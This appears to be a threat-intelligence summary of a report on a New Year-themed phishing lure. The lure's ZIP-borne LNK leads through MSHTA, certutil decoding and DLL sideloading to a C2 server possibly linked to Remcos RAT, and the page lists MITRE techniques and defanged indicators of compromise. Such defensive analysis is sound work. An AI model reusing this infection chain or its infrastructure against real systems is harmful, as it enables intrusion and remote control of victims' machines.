Threat Research

Festive Facade: Dissecting Multi-Stage Malware In New Year-themed Lure – Cyble

Securonix

CRIL uncovered a New Year-themed multi-stage malware chain starting from a ZIP that hides a shortcut LNK masquerading as a PNG. The infection flow uses MSHTA and JavaScript, decodes a payload with certutil, drops a DLL and performs DLL sideloading to reach a C2 server, potentially tied to Remcos RAT. #Remcos #DLLSideloading #MSHTA

Keypoints

  • CRIL found a ZIP named “happy new year.zip” that contains a PNG disguised shortcut file designed to lure users.
  • Opening the LNK triggers MSHTA to fetch and run additional payloads, with a JS-based downloader embedded in the HTA file.
  • The downloader downloads a JPG-like certificate file, decodes it with certutil, and expands a CAB archive to drop the malware executable.
  • Final payload execution drops two binaries, combines them into a DLL (nView.dll) via DLL sideloading, and loads nvTaskBar.exe to reach C2.
  • Persistence is achieved via a scheduled task (“ToSestsc”) that runs nvTaskBar.exe with the argument “usea.”
  • Indicators of compromise include multiple file hashes, two download URLs, and a C2 IP (91.245.253.46:443) associated with Remcos.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – This malware reaches users via spam email. ‘spam emails featuring a New Year theme’ and ‘ZIP attachment contains a shortcut file disguised as a PNG image.’
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – cmd.exe is used to run commands such as copy, expand, ping and run the malware executable. ‘cmd.exe is used to run commands such as copy, expand, ping and run the malware executable.’
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Embedded JavaScript downloader in the HTA file downloads the payload. ’embedded JavaScript function that acts as a downloader, retrieving an encoded payload from a remote server.’
  • [T1053.005] Scheduled Task/Job – Adds a scheduled task for persistence. ‘establishes a scheduled task named “ToSestsc,” set to run every 10 minutes.’
  • [T1036] Masquerading – LNK file masqueraded as PNG and Certificate file masqueraded as JPG. ‘LNK file masqueraded as PNG’ and ‘Certificate file masqueraded as JPG.’
  • [T1218.005] System Binary Proxy Execution: Mshta – Abuse mshta.exe to proxy execution of malicious JavaScript. ‘abuse mshta.exe to proxy execution of malicious JavaScript.’
  • [T1140] Deobfuscate/Decode Files or Information – Uses certutil -decode. ‘decode the base64 data within the “wct9D39.jpg” file through certutil.’
  • [T1574.002] DLL Sideloading – Malware uses DLL sideloading for payload execution. ‘DLL sideloading to obtain final-stage payload.’
  • [T1071] Application Layer Protocol – Malware communicates to the C2 server. ‘Malware exe communicate to C&C server.’

Indicators of Compromise

  • [Hash] MD5/SHA1/SHA256 – 3551655021b1ac0175d55e73c9c8af2f d55bc39f385fca3294e45a844f661444d8908988 986abd7f0b35386c2babb9fb1c81c3167a1f76bea1dd4c0d8cab5cc0e27798e8, and 99a10c546b13d3efd945c574ed4e10a4 884a2351f5c41a26a351a6d8ca5ddb84ce6130a8 b467fb098af61e4187a24447ba62c1565e354d989c8a9860106a574a81114738
  • [URL] HTA and certificate download links – hxxps[:]//mail[.]chapanakit-rta[.]com/Queen/M[.]hta, hxxps[:]//mail[.]chapanakit-rta[.]com/pt/wct9D39.jpg
  • [IP] IP address and port for C2 – 91[.]245[.]253[.]46:443
  • [File] Key artifacts – happy new year.zip, happy new year.lnk, M.hta, wct9D39.jpg (pem certificate file), wct9D39.tmp (CAB file), Winp.exe, nView.dll, NVDriverSearch.ct

Read more: https://cyble.com/blog/festive-facade-dissecting-multi-stage-malware-in-new-year-themed-lure/